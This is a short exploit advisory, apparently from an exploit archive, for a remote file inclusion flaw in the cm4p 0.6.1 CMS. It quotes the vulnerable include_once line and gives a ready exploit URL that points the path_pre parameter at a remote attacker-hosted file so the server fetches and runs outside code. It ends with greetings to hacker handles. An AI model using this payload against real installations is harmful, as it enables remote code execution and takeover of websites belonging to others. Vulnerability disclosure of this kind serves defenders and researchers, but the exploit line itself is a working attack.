cm4p version 0.6.1 suffers from a remote file inclusion vulnerability.
750747d3a9b619127bff1b9d62ad0b017b28084b2be074c64ad867cd167cbf10
********************************************
*AuThor:Silitoad ***************************
*emA!l:Silitoad[at]hotmail[dot]Com *********
*HoMePaGe: http://www.Arabian-FighterZ.com<http://www.arabian-fighterz.com/>*
********************************************
[Info]
website: http://www.mariovaldez.net
cms: cm4p
Version: 0.6.1
Download: http://www.mariovaldez.net/software/cm_4p/files/cm4p_0.6.1.zip
Problem: Include file
bug: include_once ($path_pre . "cm/cm_anon.inc.php");
[Vuls]
1.Full path disclosure:
[Exploit]
http://target.com/cm4p_0.6.1/cm/create.php?path_pre=http://evilcode.txt?
[Greetings]
Greets To
Linux_m,Str0ke,l1nuxm4,Sn1p8r,Sbitar,Op3runix,simple_clan,l33t_b3k3rz,the
leo from Midt